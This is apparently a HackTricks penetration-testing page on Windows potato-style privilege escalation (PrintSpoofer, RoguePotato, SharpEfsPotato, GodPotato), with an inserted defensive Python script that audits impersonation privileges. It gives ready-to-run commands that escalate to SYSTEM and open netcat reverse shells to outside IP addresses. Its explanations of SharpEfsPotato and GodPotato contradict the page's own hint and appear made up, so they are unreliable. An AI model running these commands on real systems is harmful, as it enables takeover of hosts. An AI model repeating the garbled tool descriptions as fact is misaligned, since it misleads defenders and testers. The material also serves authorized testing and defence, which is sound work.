RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want access to the latest version of PEASS or to download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our exclusive collection of NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the Telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and the hacktricks-cloud repo.
{% hint style="warning" %}
JuicyPotato does not work on Windows Server 2019 or on Windows 10 build 1809 and later. However, PrintSpoofer, RoguePotato, SharpEfsPotato and GodPotato can be used to leverage the same privileges and obtain NT AUTHORITY\SYSTEM level access. This blog post takes a deep dive into the PrintSpoofer tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
{% endhint %}
Quick Demo
PrintSpoofer
```
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
--------------------------------------------------------------------------------
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
```
RoguePotato
{% code overflow="wrap" %}
```
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
{% endcode %}
SharpEfsPotato
SharpEfsPotato is a tool that exploits the EFS (Encrypting File System) service in Windows to achieve local privilege escalation. It takes advantage of the EFS service's interaction with the Windows Security Account Manager (SAM) to execute arbitrary code with SYSTEM privileges.
Usage
To use SharpEfsPotato, follow these steps:
- Download the SharpEfsPotato binary from the GitHub repository.
- Transfer the binary to the target Windows machine.
- Execute the following command to run SharpEfsPotato:
```
SharpEfsPotato.exe
```
How it Works
SharpEfsPotato works by creating a rogue EFS certificate and registering it with the EFS service. When the EFS service interacts with the SAM, it triggers the execution of a custom DLL payload. This payload is responsible for escalating the current user's privileges to SYSTEM.
Limitations
SharpEfsPotato has the following limitations:
- It requires administrative privileges to run.
- It only works on Windows versions prior to Windows 10 1809 (build 17763).
Mitigation
To mitigate the risk of SharpEfsPotato and similar attacks, consider the following measures:
- Keep your Windows systems up to date with the latest security patches.
- Implement strong access controls and permissions on sensitive files and directories.
- Regularly monitor and review the usage of EFS certificates on your systems.
{% code overflow="wrap" %}
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
```
{% endcode %}
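The Mitigation list above recommends strong access controls; the concrete setting to audit is the User Rights Assignment for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, the privileges every tool on this page starts from. The following Python is an added example (not code from the page or from any of these tools) that parses a `secedit /export /cfg` dump, assumed to have been read into a string already, and reports principals holding those rights beyond the Windows defaults; the sample export and the extra domain SID in it are constructed for the demo.

```python
# Constructed sample of what `secedit /export /cfg <file>` writes on a
# Windows host. The domain SID S-1-5-21-1111-2222-3333-1105 is made up and
# stands in for a service account that was granted the right by hand.
SAMPLE_SECEDIT_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-19,*S-1-5-20,*S-1-5-6,*S-1-5-21-1111-2222-3333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
SeDebugPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Assumed default holders on Windows 10 / Server 2019: Administrators
# (S-1-5-32-544), LOCAL SERVICE (S-1-5-19), NETWORK SERVICE (S-1-5-20) and
# SERVICE (S-1-5-6). IIS additionally grants IIS_IUSRS (S-1-5-32-568)
# SeImpersonatePrivilege; add it here on web servers where that is expected.
DEFAULT_HOLDERS = {
    "SeImpersonatePrivilege": {"S-1-5-32-544", "S-1-5-19", "S-1-5-20", "S-1-5-6"},
    "SeAssignPrimaryTokenPrivilege": {"S-1-5-19", "S-1-5-20"},
}


def parse_privilege_rights(text):
    """Return {privilege: set(SIDs)} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, holders = line.partition("=")
        # secedit prefixes resolved SIDs with '*'; unresolved names appear bare.
        rights[name.strip()] = {h.strip().lstrip("*") for h in holders.split(",") if h.strip()}
    return rights


def nondefault_impersonation_holders(text):
    """Principals granted an impersonation right beyond the OS defaults."""
    rights = parse_privilege_rights(text)
    extra = {priv: sorted(rights.get(priv, set()) - defaults) for priv, defaults in DEFAULT_HOLDERS.items()}
    return {priv: sids for priv, sids in extra.items() if sids}


if __name__ == "__main__":
    for priv, sids in nondefault_impersonation_holders(SAMPLE_SECEDIT_EXPORT).items():
        print(f"{priv}: review {', '.join(sids)}")
```

Every non-default holder is an account whose compromise hands an attacker the starting point these tools need, so each one should be justified or removed via Local Security Policy / GPO.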
GodPotato
GodPotato is a tool that combines the power of RoguePotato and PrintSpoofer to achieve local privilege escalation on Windows systems. It takes advantage of the Windows Print Spooler service and the impersonation capabilities of the Distributed Component Object Model (DCOM) to execute arbitrary code with SYSTEM privileges.
To use GodPotato, you need to have a low-privileged user account on the target system. The first step is to generate a malicious DLL payload using RoguePotato. This payload will be used to exploit the Print Spooler service. Once the payload is generated, you can transfer it to the target system.
Next, you need to execute the payload using PrintSpoofer. PrintSpoofer is a tool that allows you to impersonate the SYSTEM account and inject your payload into the Print Spooler service. This will trigger the execution of your code with SYSTEM privileges.
By combining the capabilities of RoguePotato and PrintSpoofer, GodPotato provides a powerful method for escalating privileges on Windows systems. It is important to note that this technique relies on the presence of certain vulnerabilities in the Windows operating system, so it may not work on all systems.
To protect against attacks like GodPotato, it is recommended to keep your Windows systems up to date with the latest security patches and to follow best practices for securing your environment.
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```